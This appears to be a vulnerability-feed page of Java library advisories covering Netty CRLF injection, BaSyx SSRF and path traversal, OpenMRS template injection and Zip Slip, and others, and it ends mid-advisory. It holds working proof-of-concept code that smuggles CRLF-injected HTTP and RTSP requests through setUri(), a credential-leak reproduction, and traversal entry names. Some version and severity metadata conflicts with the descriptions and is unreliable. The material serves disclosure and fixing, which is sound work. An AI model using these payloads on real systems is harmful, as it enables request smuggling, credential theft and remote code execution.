Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests. In practice, this leads to HTTP request smuggling / desynchronization on the HTTP side and request injection on the RTSP side.

### Details

The root issue is that URI validation exists only on the constructor path, but not on the public setter path.

- `io.netty.handler.codec.http.DefaultHttpRequest`
  - The constructor calls `HttpUtil.validateRequestLineTokens(method, uri)`
  - `setUri(String uri)` only performs `checkNotNull` and does not validate
- `io.netty.handler.codec.http.DefaultFullHttpRequest`
  - `setUri(String uri)` delegates to the parent implementation
- `io.netty.handler.codec.http.HttpRequestEncoder`
  - Writes `request.uri()` directly into the request line
- `io.netty.handler.codec.rtsp.RtspEncoder`
  - Writes `request.uri()` directly into the request line

This creates the following bypass:

1. An application creates a `DefaultHttpRequest` or `DefaultFullHttpRequest` with a safe URI
2. Later, attacker-influenced input is passed into `setUri()`
3. `HttpRequestEncoder` or `RtspEncoder` encodes that value verbatim
4. The downstream server, proxy, or RTSP peer interprets the injected bytes after CRLF as separate requests

This appears to be an incomplete fix pattern where start-line validation exists, but can still be bypassed through a mutable public API.

### PoC (HTTP)

The following code first creates a normal request object and then injects a malicious request line using `setUri()`.
```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.DefaultHttpRequest;
import io.netty.handler.codec.http.HttpMethod;
import io.netty.handler.codec.http.HttpRequestEncoder;
import io.netty.handler.codec.http.HttpServerCodec;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.util.CharsetUtil;

public final class HttpSetUriSmugglePoc {
    public static void main(String[] args) {
        EmbeddedChannel client = new EmbeddedChannel(new HttpRequestEncoder());
        EmbeddedChannel server = new EmbeddedChannel(new HttpServerCodec());

        DefaultHttpRequest request = new DefaultHttpRequest(
                HttpVersion.HTTP_1_1, HttpMethod.GET, "/safe");
        request.setUri("/s1 HTTP/1.1\r\n" +
                "\r\n" +
                "POST /s2 HTTP/1.1\r\n" +
                "content-length: 11\r\n\r\n" +
                "Hello World" +
                "GET /s1");

        client.writeOutbound(request);
        ByteBuf outbound = client.readOutbound();

        System.out.println("=== Raw encoded request ===");
        System.out.println(outbound.toString(CharsetUtil.US_ASCII));

        System.out.println("=== Decoded by HttpServerCodec ===");
        server.writeInbound(outbound.retainedDuplicate());
        Object msg;
        while ((msg = server.readInbound()) != null) {
            System.out.println(msg);
        }

        outbound.release();
        client.finishAndReleaseAll();
        server.finishAndReleaseAll();
    }
}
```

When reproduced, the raw encoded request looks like this:

```http
GET /s1 HTTP/1.1

POST /s2 HTTP/1.1
content-length: 11

Hello WorldGET /s1 HTTP/1.1
```

`HttpServerCodec` then parses this as multiple HTTP messages rather than a single request:

- `GET /s1`
- `POST /s2` with body `Hello World`
- trailing `GET /s1`

This confirms that the value supplied through `setUri()` is interpreted on the wire as additional requests.

### PoC (RTSP)

The same root cause also affects `RtspEncoder`. A minimal reproduction is shown below.
```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.DefaultHttpRequest;
import io.netty.handler.codec.rtsp.RtspDecoder;
import io.netty.handler.codec.rtsp.RtspEncoder;
import io.netty.handler.codec.rtsp.RtspMethods;
import io.netty.handler.codec.rtsp.RtspVersions;
import io.netty.util.CharsetUtil;

public final class RtspSetUriSmugglePoc {
    public static void main(String[] args) {
        EmbeddedChannel client = new EmbeddedChannel(new RtspEncoder());
        EmbeddedChannel server = new EmbeddedChannel(new RtspDecoder());

        DefaultHttpRequest request = new DefaultHttpRequest(
                RtspVersions.RTSP_1_0, RtspMethods.OPTIONS, "rtsp://safe/media");
        request.setUri("rtsp://cam/stream RTSP/1.0\r\n" +
                "CSeq: 1\r\n\r\n" +
                "DESCRIBE rtsp://cam/secret RTSP/1.0\r\n" +
                "CSeq: 2\r\n\r\n" +
                "OPTIONS rtsp://cam/final");

        client.writeOutbound(request);
        ByteBuf outbound = client.readOutbound();

        System.out.println("=== Raw encoded RTSP request ===");
        System.out.println(outbound.toString(CharsetUtil.US_ASCII));

        System.out.println("=== Decoded by RtspDecoder ===");
        server.writeInbound(outbound.retainedDuplicate());
    }
}
```

When reproduced, `RtspEncoder` generates consecutive RTSP requests in a single encoded payload:

```text
OPTIONS rtsp://cam/stream RTSP/1.0
CSeq: 1

DESCRIBE rtsp://cam/secret RTSP/1.0
CSeq: 2

OPTIONS rtsp://cam/final RTSP/1.0
```

`RtspDecoder` then parses this as three separate RTSP requests:

- `OPTIONS rtsp://cam/stream`
- `DESCRIBE rtsp://cam/secret`
- `OPTIONS rtsp://cam/final`

This confirms that the same setter bypass is exploitable for RTSP request injection as well.
### Impact

The vulnerable conditions are:

- The application uses `DefaultHttpRequest` or `DefaultFullHttpRequest`
- The request object is created first and later modified through `setUri()`
- The value passed into `setUri()` is attacker-controlled or attacker-influenced
- The object is eventually serialized by `HttpRequestEncoder` or `RtspEncoder`

Under those conditions, an attacker may be able to:

- perform HTTP request smuggling
- trigger proxy/backend desynchronization
- inject additional requests toward internal APIs
- confuse request boundaries and bypass assumptions around authentication or routing
- inject RTSP requests

The exact impact depends on how the application constructs URIs and how the upstream/downstream HTTP or RTSP components parse request boundaries, but the security impact is real and reproducible.

### Root Cause

Validation is enforced only at object construction time, but not on the public mutation API that can break the same security invariant. As a result, the constructors are safe while the public `setUri()` path is not, and the encoders trust and serialize the mutated value without revalidation.

### Suggested Fix Direction

`DefaultHttpRequest.setUri()` and all delegating/inheriting paths should apply the same request-line token validation as the constructors. Recommended regression coverage:

- verify that `setUri()` rejects CRLF-containing input after object construction
- verify that `DefaultFullHttpRequest.setUri()` is blocked as well
- verify that spaces, `\r`, `\n`, and request-smuggling payloads are rejected
- verify that both `HttpRequestEncoder` and `RtspEncoder` are protected from setter-based bypasses

### Affected Area

- `netty-codec-http`
  - `io.netty.handler.codec.http.DefaultHttpRequest`
  - `io.netty.handler.codec.http.DefaultFullHttpRequest`
  - `io.netty.handler.codec.http.HttpRequestEncoder`
  - `io.netty.handler.codec.rtsp.RtspEncoder`
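The validation the suggested fix direction calls for amounts to rejecting any character that can terminate or split the start-line. A Python sketch of the check (Netty's actual implementation is Java; this is illustrative only):

```python
# Sketch of the request-line token validation that setUri() should apply,
# mirroring what the constructors already enforce: a URI containing CR, LF,
# or a space would break the start-line, so it must be rejected.
FORBIDDEN = ("\r", "\n", " ")

def is_valid_request_uri(uri: str) -> bool:
    return bool(uri) and not any(c in uri for c in FORBIDDEN)

# The HTTP PoC payload above would fail this check at setUri() time:
smuggle = ("/s1 HTTP/1.1\r\n\r\n"
           "POST /s2 HTTP/1.1\r\ncontent-length: 11\r\n\r\nHello World")
```

With this in place, the setter path and the constructor path enforce the same invariant, closing the bypass.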

Affected versions

4.0.0.Alpha1, 4.0.0.Alpha2, 4.0.0.Alpha3, 4.0.0.Alpha4, 4.0.0.Alpha5

Vulnerability type

CWE-93 — CRLF Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

8.6/10 High
📦 org.eclipse.basyx:basyx.sdk 📌 1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0 🌐 Browser ☕ Java Maven library ⚡ SSRF 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POS...
📅 2026-05-05 NVD 🔗 Details

Full description

In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS).
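The usual remediation for this class of flaw is to validate the delegation destination against an explicit allowlist before issuing the request. A hedged Python sketch under assumed names (the allowlist and host are hypothetical, not the actual BaSyx fix):

```python
from urllib.parse import urlparse

# Hypothetical allowlist check for an Operation Delegation destination URI.
# The allowed host set is an assumption for illustration; a real deployment
# would load it from configuration.
ALLOWED_DELEGATION_HOSTS = {"ops.example.internal"}

def is_allowed_delegation_target(uri: str) -> bool:
    parsed = urlparse(uri)
    return (parsed.scheme in ("http", "https")
            and parsed.hostname in ALLOWED_DELEGATION_HOSTS)
```

Validating the scheme as well as the host blocks both internal pivoting (e.g., the IMDS address) and non-HTTP schemes.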

Affected versions

1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0

Vulnerability type

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

10/10 Critical
📦 org.eclipse.basyx:basyx.sdk 📌 1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0 🌐 Browser ☕ Java Maven library ⚡ Path Traversal 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload o...
📅 2026-05-05 NVD 🔗 Details

Full description

In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload operation, an attacker can bypass intended storage boundaries and write arbitrary files to any location on the host filesystem accessible by the Java process. This can lead to Remote Code Execution (RCE) and complete system compromise.
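The standard fix for this class of bug is canonicalize-then-contain: resolve the joined path and reject it if it escapes the storage root. A Python sketch under assumed paths (illustrative only, not the actual BaSyx patch):

```python
import os

# Sketch of a canonicalize-then-contain check for an uploaded fileName.
# The storage root is a hypothetical example path.
def resolve_upload_path(storage_root: str, file_name: str) -> str:
    root = os.path.realpath(storage_root)
    candidate = os.path.realpath(os.path.join(root, file_name))
    # Reject anything that resolves outside the storage root
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path traversal attempt: " + file_name)
    return candidate
```

A `fileName` like `../../etc/passwd` canonicalizes outside the root and is rejected, while plain names pass through unchanged.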

Affected versions

1.0.1, 1.0.2, 1.1.0, 1.2.0, 1.3.0

Vulnerability type

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

7.3/10 High
📦 thrift 🏢 apache 📌 All versions < 0.23.0 🗄️ Server ☕ Java Maven library ⚡ CWE-297 🎯 Remote ⚪ Not exploited
💬 Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.
📅 2026-05-05 NVD 🔗 Details

Full description

Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version [0.23.0](https://github.com/apache/thrift/releases/tag/v0.23.0), which fixes the issue.
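CWE-297 means a TLS client verifies that the peer certificate chains to a trusted CA but not that the certificate's name matches the host it is connecting to. A generic Python illustration of the safe client-side settings (this is the stdlib `ssl` module, not Apache Thrift's API):

```python
import ssl

# Generic illustration of the CWE-297 remediation on the client side:
# hostname checking must be enabled in addition to chain verification.
# ssl.create_default_context() turns both on by default.
ctx = ssl.create_default_context()

hostname_checked = ctx.check_hostname                    # name-vs-host check
chain_verified = ctx.verify_mode == ssl.CERT_REQUIRED    # CA chain check
```

Disabling either check independently reintroduces the mismatch class of bug, which is why hardened defaults couple them.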

Affected versions

All versions < 0.23.0

Vulnerability type

CWE-297 — Improper Validation of Certificate with Host Mismatch

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Unspecified
📦 io.quarkiverse.openapi.generator:quarkus-openapi-generator 📌 All versions < 0.1.0, 0.10.0, 0.11.0, 0.12.0, 0.2.0 🌐 Browser ☕ Java Maven library ⚡ Info Disclosure 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary The generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resemble...
📅 2026-05-04 OSV/Maven 🔗 Details

Full description

### Summary

The generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints.

### Details

The runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats `{param}` placeholders as `.*`, which incorrectly allows a single path parameter to consume `/`. As a result, a protected path such as `/repos/{ref}` also matches `/repos/foo/bar`, even though `/repos/{owner}/{repo}` is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials.

This affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. The issue is reachable through normal generated-client usage and does not require modifying generated code.
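The over-broad match and a segment-safe alternative can be demonstrated with a small sketch; Python regexes stand in for the generated filter's Java matching, so this is illustrative only:

```python
import re

# match_broken mirrors the vulnerable translation described above
# ({param} -> ".*", so a parameter can consume "/"); match_fixed shows a
# segment-safe translation ({param} -> "[^/]+").
def _translate(template: str, param_pattern: str) -> str:
    return re.sub(r"\{[^/}]+\}", param_pattern, template)

def match_broken(template: str, path: str) -> bool:
    return re.fullmatch(_translate(template, ".*"), path) is not None

def match_fixed(template: str, path: str) -> bool:
    return re.fullmatch(_translate(template, "[^/]+"), path) is not None
```

With the broken translation, `/repos/{ref}` matches `/repos/foo/bar` and the filter attaches `bearerAuth` credentials to the wrong operation; with the segment-safe translation it does not.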
### PoC

```bash
mkdir -p /tmp/qoag-poc/src/main/java/org/acme
mkdir -p /tmp/qoag-poc/src/main/resources
mkdir -p /tmp/qoag-poc/src/main/openapi

cat > /tmp/qoag-poc/pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <groupId>org.acme</groupId>
  <artifactId>qoag-poc</artifactId>
  <version>1.0.0</version>
  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <maven.compiler.release>17</maven.compiler.release>
    <quarkus.platform.group-id>io.quarkus</quarkus.platform.group-id>
    <quarkus.platform.artifact-id>quarkus-bom</quarkus.platform.artifact-id>
    <quarkus.platform.version>3.34.3</quarkus.platform.version>
    <qoag.version>2.16.0</qoag.version>
  </properties>
  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>${quarkus.platform.group-id}</groupId>
        <artifactId>${quarkus.platform.artifact-id}</artifactId>
        <version>${quarkus.platform.version}</version>
        <type>pom</type>
        <scope>import</scope>
      </dependency>
    </dependencies>
  </dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>io.quarkiverse.openapi.generator</groupId>
      <artifactId>quarkus-openapi-generator</artifactId>
      <version>${qoag.version}</version>
    </dependency>
    <dependency>
      <groupId>io.quarkus</groupId>
      <artifactId>quarkus-rest</artifactId>
    </dependency>
    <dependency>
      <groupId>io.quarkus</groupId>
      <artifactId>quarkus-rest-client-jackson</artifactId>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>io.quarkus</groupId>
        <artifactId>quarkus-maven-plugin</artifactId>
        <version>${quarkus.platform.version}</version>
        <extensions>true</extensions>
        <executions>
          <execution>
            <goals>
              <goal>build</goal>
              <goal>generate-code</goal>
              <goal>generate-code-tests</goal>
            </goals>
          </execution>
        </executions>
      </plugin>
      <plugin>
        <artifactId>maven-compiler-plugin</artifactId>
        <version>3.14.0</version>
        <configuration>
          <parameters>true</parameters>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
EOF

cat > /tmp/qoag-poc/src/main/openapi/repro.yaml <<'EOF'
openapi: 3.0.3
info:
  title: repro
  version: 1.0.0
paths:
  /repos/{ref}:
    get:
      operationId: getRef
      parameters:
        - in: path
          name: ref
          required: true
          schema:
            type: string
      security:
        - bearerAuth: []
      responses:
        "200":
          description: ok
          content:
            text/plain:
              schema:
                type: string
  /repos/{owner}/{repo}:
    get:
      operationId: getOwnerRepo
      parameters:
        - in: path
          name: owner
          required: true
          schema:
            type: string
        - in: path
          name: repo
          required: true
          schema:
            type: string
      responses:
        "200":
          description: ok
          content:
            text/plain:
              schema:
                type: string
components:
  securitySchemes:
    bearerAuth:
      type: http
      scheme: bearer
EOF

cat > /tmp/qoag-poc/src/main/resources/application.properties <<'EOF'
quarkus.http.port=8081
quarkus.openapi-generator.codegen.default-security-scheme=bearerAuth
quarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro
quarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080
quarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET
EOF

cat > /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java <<'EOF'
package org.acme;

import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
import org.eclipse.microprofile.rest.client.inject.RestClient;

@Path("/trigger")
public class TriggerResource {

    @RestClient
    org.acme.repro.api.DefaultApi api;

    @GET
    @Produces(MediaType.TEXT_PLAIN)
    public String trigger() {
        api.getOwnerRepo("foo", "bar");
        return "done";
    }
}
EOF

python - <<'PY' &
from http.server import BaseHTTPRequestHandler, HTTPServer

class H(BaseHTTPRequestHandler):
    def do_GET(self):
        print("PATH=" + self.path, flush=True)
        print("AUTH=" + str(self.headers.get("Authorization")), flush=True)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, fmt, *args):
        pass

HTTPServer(("127.0.0.1", 18080), H).serve_forever()
PY

cd /tmp/qoag-poc
mvn -q package -DskipTests
java -jar target/quarkus-app/quarkus-run.jar &
sleep 8

curl -s http://127.0.0.1:8081/trigger
# PATH=/repos/foo/bar
# AUTH=Bearer SECRET
```

### Impact

Clients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.

Affected versions

All versions < 0.1.0, 0.10.0, 0.11.0, 0.12.0, 0.2.0

Vulnerability type

CWE-200 — Info Disclosure

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Critical
📦 org.thymeleaf:thymeleaf 📌 1.0.0, 1.0.0-beta1, 1.0.0-beta2, 1.0.0-beta3, 1.0.0-beta4 🗄️ Server ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact A security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) c...
📅 2026-05-04 OSV/Maven 🔗 Details

Full description

### Impact

A security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf up to and including 3.1.4.RELEASE. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow such expressions to be executed. If an application developer passes unsanitized variables containing such expressions to the template engine, and these values are used in sandboxed contexts inside the templates, the expressions can be executed, achieving Server-Side Template Injection (SSTI).

### Patches

This has been fixed in Thymeleaf 3.1.5.RELEASE. All users are advised to upgrade immediately.

### Workarounds

No workaround is available beyond ensuring applications do not pass unvalidated/unsanitized data directly to the template engine. Upgrading to 3.1.5.RELEASE is strongly recommended in any case.

Affected versions

1.0.0, 1.0.0-beta1, 1.0.0-beta2, 1.0.0-beta3, 1.0.0-beta4

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Critical
📦 org.openmrs.api:openmrs-api 📌 2.7.0 → 2.7.9 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact The `ConceptReferenceRangeUtility.evaluateCriteria()` method in OpenMRS Core evaluates database-stored criteria strings as Apache Velocity templates without any sandbox configuration. The `VelocityEngine` is initialized with only logging properties and no`SecureUbersp...
📅 2026-05-04 OSV/Maven 🔗 Details

Full description

### Impact The `ConceptReferenceRangeUtility.evaluateCriteria()` method in OpenMRS Core evaluates database-stored criteria strings as Apache Velocity templates without any sandbox configuration. The `VelocityEngine` is initialized with only logging properties and no`SecureUberspector`, leaving the default `UberspectImpl` in place, which allows unrestricted Java reflection through template expressions. A user with the `Manage Concepts` privilege can store a malicious Velocity template expression in a concept's reference range criteria field. This payload is then executed automatically whenever a user or API call validates an observation against the affected concept. The Velocity context exposes `$patient` (the `Person` / `Patient` object), `$obs` (the `Obs` object), and `$fn` (the `ConceptReferenceRangeUtility` instance with access to the full OpenMRS service layer). **Persistent Remote Code Execution**: The payload persists in the concept_reference_range database table (VARCHAR 65535). A single compromised concept for a common clinical measurement executes the payload on every subsequent observation validation across all users, API clients, and integrations in the facility. **Privilege Escalation**: The Manage Concepts privilege is a content-management function, defined as "Able to add/edit/delete concept entries", not an administrative privilege. Multiple non-admin staff per facility typically hold this privilege. The attacker escalates from concept dictionary management to arbitrary code execution as the Tomcat application server process. **PHI Exfiltration**: The Velocity context objects directly expose patient data without requiring OS-level RCE. ### Patches This is fixed in 2.8.6 and 2.7.9 as well as future versions. ### Workarounds Ensure the `Manage Concepts` privilege is restricted to only authorized users and carefully audit any `ConceptReferenceRanges` in the database. 
### Resources

- https://github.com/openmrs/openmrs-core/commit/8d1c193
- https://www.machinespirits.com/advisory/1e8430/

الإصدارات المتأثرة

2.7.0 → 2.7.9

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

4.4/10 متوسطة
📦 org.xwiki.contrib.plantuml:macro-plantuml-macro ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ SSRF 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact The [PlantUML Macro](https://extensions.xwiki.org/xwiki/bin/view/Extension/PlantUML+Macro) is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the `server` parameter. However, the application does n...
📅 2026-05-04 NVD 🔗 التفاصيل

الوصف الكامل

### Impact

The [PlantUML Macro](https://extensions.xwiki.org/xwiki/bin/view/Extension/PlantUML+Macro) is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the `server` parameter, but the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL, and the XWiki server will attempt to connect to it to "render" the diagram. This issue affects all versions of the PlantUML Macro extension up to and including version 2.4.

### Patches

Version 2.4.1 of the PlantUML Macro extension fixes the issue by verifying that the supplied server domain matches one of the [trusted domains configured inside XWiki](https://www.xwiki.org/xwiki/bin/view/Documentation/AdminGuide/Configuration/#HTrusteddomains).

### Workarounds

Protect the XWiki server by placing it in a DMZ so that it cannot reach any other internal servers.

### Resources

The issue was fixed in [PLANTUML-25](https://jira.xwiki.org/browse/PLANTUML-25) by commit [c8b19bda93058794e04c8862fc7ca85c59b5fe5c](https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c).

### For more information

If there are any questions or comments about this advisory:

* Open an issue in [JIRA XWiki.org](https://jira.xwiki.org/)
* Send an email to the [Security Mailing List](mailto:security@xwiki.org)

### Attribution

The issue was reported by Łukasz Rybak.
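The fix direction (checking the user-supplied server host against an allowlist of trusted domains) can be sketched in plain Java. This is a minimal illustration, not the actual patch: the host name below is hypothetical, and the real fix delegates to XWiki's trusted-domains configuration rather than a hard-coded set.

```java
import java.net.URI;
import java.util.Set;

public class TrustedServerCheckDemo {
    // Hypothetical allowlist; a real deployment would read this from
    // XWiki's trusted-domains configuration.
    static final Set<String> TRUSTED_HOSTS = Set.of("plantuml.example.org");

    // Reject any user-supplied server URL whose host is not allowlisted.
    static boolean isTrusted(String serverUrl) {
        try {
            String host = URI.create(serverUrl).getHost();
            return host != null && TRUSTED_HOSTS.contains(host);
        } catch (IllegalArgumentException e) {
            return false; // malformed URL: reject
        }
    }

    public static void main(String[] args) {
        System.out.println(isTrusted("https://plantuml.example.org/png"));      // true
        System.out.println(isTrusted("http://169.254.169.254/latest/meta-data/")); // false
    }
}
```

Matching on the parsed host (rather than a substring of the raw URL) avoids classic allowlist bypasses such as `https://plantuml.example.org.attacker.net/`.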

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

عالية
📦 org.openmrs.web:openmrs-web 🏢 openmrs 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل
💬 ## Affected Versions version ≤ 2.7.8 (latest version at time of disclosure) https://github.com/openmrs/openmrs-core ## Impact The endpoint `POST /openmrs/ws/rest/v1/module` is vulnerable to a path traversal (Zip Slip) attack. An authenticated attacker can upload a crafted `.o...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Affected Versions

version ≤ 2.7.8 (latest version at time of disclosure)

https://github.com/openmrs/openmrs-core

## Impact

The endpoint `POST /openmrs/ws/rest/v1/module` is vulnerable to a path traversal (Zip Slip) attack. An authenticated attacker can upload a crafted `.omod` archive containing ZIP entries with directory traversal sequences. Upon automatic extraction by the server, the incomplete path validation in `WebModuleUtil.startModule()` fails to prevent entries such as `web/module/../../../../malicious.jsp` from being written outside the intended module directory. If the traversal target falls within the web application root (e.g., `/usr/local/tomcat/webapps/openmrs/`), the attacker achieves arbitrary file write and subsequent Remote Code Execution.

Notably, other extraction methods in the same codebase (`ModuleUtil.expandJar()`, `TestInstallUtil.addZippedTestModules()`) are properly protected with `normalize().startsWith()` checks — this vulnerability is an oversight where the same fix was not applied.

Furthermore, the `module.allow_web_admin` runtime property, which is intended to restrict administrators from managing modules via the web interface, only gates the Legacy UI controller entry point. The REST API endpoint `POST /openmrs/ws/rest/v1/module` does not check this property, allowing the restriction to be fully bypassed.

## Steps to Reproduce

1. Construct a malicious `.omod` file (a ZIP/JAR archive) containing a ZIP entry with a path traversal payload in its entry name, such as `web/module/../../../../<target_filename>`. Upload this file to `POST /openmrs/ws/rest/v1/module` with valid admin credentials via Basic Auth.

   <img width="1986" height="1102" alt="image" src="https://github.com/user-attachments/assets/647f15de-7e8c-40b9-aba9-d4db5d2e0b52" />
   <img width="2048" height="1078" alt="image" src="https://github.com/user-attachments/assets/301412a0-e3b0-4afb-91c2-e9739de3080d" />

2. The server parses and loads the module. During `WebModuleUtil.startModule()`, entries under `web/module/` are automatically extracted. The existing check `Paths.get(name).startsWith("..")` only blocks entries beginning with `..`, so an entry starting with `web/module/` passes the check. The `../` sequences in the remaining path cause the file to be written outside the intended `WEB-INF/view/module/` directory — for example, into the web application root at `/usr/local/tomcat/webapps/openmrs/`.

   <img width="1439" height="141" alt="image" src="https://github.com/user-attachments/assets/4bda3b1e-a80e-42ed-af2b-a1da53e8db03" />

3. The traversed file is now accessible under the web application root. If the written file is a JSP script, accessing it via the browser triggers server-side execution, achieving RCE.

   <img width="1482" height="300" alt="image" src="https://github.com/user-attachments/assets/61936002-78cd-4203-80f0-f0a8702b216c" />

## Root Cause Analysis

The vulnerability exists in `WebModuleUtil.startModule()` (`web/src/main/java/org/openmrs/module/web/WebModuleUtil.java`).

### Vulnerable code:

```java
Enumeration<JarEntry> entries = jarFile.entries();
while (entries.hasMoreElements()) {
    JarEntry entry = entries.nextElement();
    String name = entry.getName();
    // ❌ Incomplete check — only blocks entries starting with ".."
    if (Paths.get(name).startsWith("..")) {
        throw new UnsupportedOperationException("...");
    }
    if (name.startsWith("web/module/")) {
        String filepath = name.substring(11);
        StringBuilder absPath = new StringBuilder(realPath + "/WEB-INF");
        absPath.append("/view/module/");
        absPath.append(mod.getModuleIdAsPath()).append("/").append(filepath);
        // ❌ No normalize() or startsWith() boundary check before writing
        File outFile = new File(absPath.toString().replace("/", File.separator));
        outStream = new FileOutputStream(outFile, false);
        inStream = jarFile.getInputStream(entry);
        OpenmrsUtil.copyFile(inStream, outStream);
    }
}
```

**Why the check fails:** For an entry named `web/module/foo/../../../../evil.jsp`, `Paths.get(name)` starts with `web`, not `..`, so the check passes. After `name.substring(11)`, the filepath `foo/../../../../evil.jsp` is concatenated directly into the output path without normalization, resulting in a write outside the intended directory.

### Correctly protected code in the same codebase:

**`ModuleUtil.expandJar()`:**

```java
// ✅ Correct — uses normalize().startsWith()
if (!parent.toPath().normalize().startsWith(docBase)) {
    throw new UnsupportedOperationException("...");
}
```

**`TestInstallUtil.addZippedTestModules()`:**

```java
// ✅ Correct — uses normalize().startsWith()
if (!zipEntryFile.toPath().normalize().startsWith(moduleRepository.toPath().normalize())) {
    throw new IOException("Bad zip entry");
}
```

The fix pattern is already known and applied elsewhere in the codebase; `WebModuleUtil.startModule()` is an oversight.

### Bypass of `module.allow_web_admin`

